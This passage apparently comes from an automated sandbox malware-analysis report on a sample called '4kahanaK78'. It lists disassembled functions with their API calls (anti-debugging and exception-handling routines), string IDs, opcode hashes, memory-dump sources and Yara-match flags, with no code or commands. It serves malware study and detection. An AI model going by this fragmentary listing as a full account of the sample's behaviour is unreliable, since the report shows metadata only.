                                    • Opcode Fuzzy Hash: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                    • Instruction Fuzzy Hash: F1C22A72E042288FDB25CE28DD507EAB3B5EB49314F1441ABD84DE7280E779AEC58F45
                                    Function 00985646 Relevance: 9.2, Strings: 6, Instructions: 1668COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: &@y$@5g9$DXm$E!~~$Ra+w$]/13
                                    • API String ID: 0-2582686233
                                    • Opcode ID: 95199d6af41b5fe488c53db9d20da1f398365aa248c099697ba273506d89ddca
                                    • Instruction ID: de6357a38cf5a8c04608713ac98761819c17bce66ec2c481906450275c502fa1
                                    • Opcode Fuzzy Hash: 95199d6af41b5fe488c53db9d20da1f398365aa248c099697ba273506d89ddca
                                    • Instruction Fuzzy Hash: 08B258F3A0C2109FE3046E2DEC8567ABBE5EF94720F1A863DEAC4C7744E93558058697
                                    Function 00980550 Relevance: 6.6, Strings: 4, Instructions: 1630COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :;n$?/7$bN_$nT/V
                                    • API String ID: 0-913784486
                                    • Opcode ID: 2afae0264f887be88a95ab80353312b90a25a6f737701035a32ee40cc5f0e7c9
                                    • Instruction ID: ee3b36436c69700950cede54c16f1866150efa70671a2062b80d0342a2d04414
                                    • Opcode Fuzzy Hash: 2afae0264f887be88a95ab80353312b90a25a6f737701035a32ee40cc5f0e7c9
                                    • Instruction Fuzzy Hash: 31B217F360C304AFE3046E29EC8567ABBE9EF94720F1A493DE6C4C3744E63598458697
                                    Function 10002FDA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                    • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                    • String ID:
                                    • API String ID: 254469556-0
                                    • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                    • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                    • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                    • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                    Function 04B49A19 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 04B49A25
                                    • IsDebuggerPresent.KERNEL32 ref: 04B49AF1
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B49B11
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 04B49B1B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                    • String ID:
                                    • API String ID: 254469556-0
                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                    • Instruction ID: 3f826736889305ecb234e0bb4f6114a69f31afa50bf0e8fcc6e92b3813a43dd4
                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                    • Instruction Fuzzy Hash: AC311AB5D4121C9BDB20DFA4D989BCDBBB8BF48304F1040EAE409A7250EB715A85DF04
                                    Function 004097B2 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
                                    • IsDebuggerPresent.KERNEL32 ref: 0040988A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                    • String ID:
                                    • API String ID: 254469556-0
                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                    • Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                    • Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49
                                    Function 04CE2070 Relevance: 5.5, Strings: 4, Instructions: 504COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0,@$@$@,@$`,@
                                    • API String ID: 0-1654315312
                                    • Opcode ID: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                    • Instruction ID: d0229a7677e4139180f17e2684249ffde0658b308fba598201ba1c91857123c9
                                    • Opcode Fuzzy Hash: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                    • Instruction Fuzzy Hash: D2128C71B012099FDB14CF9AD980BBDB7BAFF48314F1441A9E909AB281DB74F941CB90
                                    Function 100056A0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                    • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                    • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                    • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                    Function 04B4C31A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 04B4C412
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 04B4C41C
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 04B4C429
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                    • Instruction ID: 46b9c7b27c31c4f677a546c9b3137b8e337d51f6eae02f45cfbb35a4547c6502
                                    • Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                    • Instruction Fuzzy Hash: 5831C7B490122CABCB61DF28DD887DDBBB4BF48710F5041EAE41CA7250E770AB859F49
                                    Function 0040C0B3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                    • Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
                                    • Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                    • Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49
                                    Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                    • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                    • ExitProcess.KERNEL32 ref: 10005F60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                    • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                    • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                    • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                    Function 04B4F174 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F196
                                    • TerminateProcess.KERNEL32(00000000,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F19D
                                    • ExitProcess.KERNEL32 ref: 04B4F1AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                    • Instruction ID: 5a0b6906482cab578f04eaf4a73385882b6fb4f46445c91b1b3a9aa926e356b2
                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                    • Instruction Fuzzy Hash: 0FE0B671844118AFDB117F54DD48A993B69FF90685F004464F80587231CB76E991DB94
                                    Function 0098F5BF Relevance: 4.1, Strings: 2, Instructions: 1603COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 9?$(w
                                    • API String ID: 0-2208932022
                                    • Opcode ID: fd60c88f7942208aa25034089ad6649aa3474deb93ab7aca3a00feecf28768aa
                                    • Instruction ID: 1242129f0a564b723ec9c07215b7f7a1dc6915d754f34c5fd33a182a91d9e21f
                                    • Opcode Fuzzy Hash: fd60c88f7942208aa25034089ad6649aa3474deb93ab7aca3a00feecf28768aa
                                    • Instruction Fuzzy Hash: 3AB217F360C2009FE704AE2DEC8567ABBE9EF94720F1A893DE6C583744E93558058797
                                    Function 009820D7 Relevance: 4.1, Strings: 2, Instructions: 1593COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #b{L$Sl{
                                    • API String ID: 0-2527554373
                                    • Opcode ID: af723b17b530d366b47a2f74f0307db733bb91364f9519c5e0f9930b9dba41b1
                                    • Instruction ID: 333769aace645e568218ce24932ab7875ca7fe42d72323d0dc9d8436795e4cb3
                                    • Opcode Fuzzy Hash: af723b17b530d366b47a2f74f0307db733bb91364f9519c5e0f9930b9dba41b1
                                    • Instruction Fuzzy Hash: F2B2E6F3A0C2009FE304AE29EC8577AB7E5EF94720F16893DEAC4C7744EA7558058796
                                    Function 04B4092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .$GetProcAddress.$l
                                    • API String ID: 0-2784972518
                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                    • Instruction ID: d5037ae184a1353f3a29f5d41dbbdc7d36793d66b344cbbfc880b87a4d66a8bb
                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                    • Instruction Fuzzy Hash: FB316CB6910609DFEB10DF99C880AAEBBF5FF48324F14408AD941A7310D771FA45DBA4
                                    Function 04CEE720 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction ID: 02789542c2a9dd6b1b9024e0eb83ec463df33c94b6ca43b61aaec5cd597af798
                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction Fuzzy Hash: 31F14E71E002199FDF14CFA9D8806AEBBF2FF88354F15866DD919AB344D731AA01CB94
                                    Function 04B4F587 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction ID: e80ba316238a52440995120652ccb2ba54186a16ce09c0288fdc6cfb70fcf59f
                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction Fuzzy Hash: A0F13071E00219DFDF14CFA9D9806ADF7B1FF88324F2582A9D919AB344D731A941DB90
                                    Function 0040F320 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94
                                    Function 0098E78B Relevance: 3.1, Strings: 2, Instructions: 583COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: <2w?$vO
                                    • API String ID: 0-3489756923
                                    • Opcode ID: 0b371a4011787402b5831a0b3b78c3fb5b71548a8f68021a20fd7eb5fb37039f
                                    • Instruction ID: 1e0c27e69267a9f0a8de3f2bc8e3fa90ed5e52160db3e73e203ca961cdb395c4
                                    • Opcode Fuzzy Hash: 0b371a4011787402b5831a0b3b78c3fb5b71548a8f68021a20fd7eb5fb37039f
                                    • Instruction Fuzzy Hash: C20218F361C200AFE7086E2DDC8577AB7D9EF94720F1A453EEAC5C3744E93558018696
                                    Function 04CF7CAA Relevance: 3.0, APIs: 1, Instructions: 1451COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID:
                                    • API String ID: 4168288129-0
                                    • Opcode ID: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
                                    • Instruction ID: 3f6a67a305f66c5e7a4f14eedf4bc49c5343a177f11854dd6e9b10dc1c656e69
                                    • Opcode Fuzzy Hash: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
                                    • Instruction Fuzzy Hash: 1DC25B71E046288FDBA4DE29DD407E9B3B6EB48314F1441EADA0DE7240E778BE858F50
                                    Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                    • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                    • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                    • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                    Function 04B53F4D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B53F48,?,?,00000008,?,?,04B5AB25,00000000), ref: 04B5417A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction ID: 851bf4821145136d6815e672a2d621058b53c36e9e3f86bff6807aee8922e64a
                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction Fuzzy Hash: 84B13F35610605DFDB15CF28C486B65BBE0FF45365F298698E899CF2B2C336E992CB40
                                    Function 00413CE6 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44
                                    Function 10007EA9 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                    • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                    • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                    • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                    Function 04B55F6E Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                    • Instruction ID: 2a02ed98e1fb0d2dcd136e8a3c24fc4c13b555c0caf67f709e2798379d18ada7
                                    • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                    • Instruction Fuzzy Hash: 4B41A2B5804218AFDF20DF79CC88BAAFBB8EB45304F5442D9E85DD3210DA35AE858F50
                                    Function 00415D07 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                    • Instruction ID: 5ef8e782818ac5c356667e56c32e051b370d413b7f744af6f0ed5b3d29dfc074
                                    • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                    • Instruction Fuzzy Hash: 5141B6B1C04618AFDB24DF69CC89AEABBB8EF85304F1442DEE41DD3211DA359E858F14
                                    Function 04B49BB0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
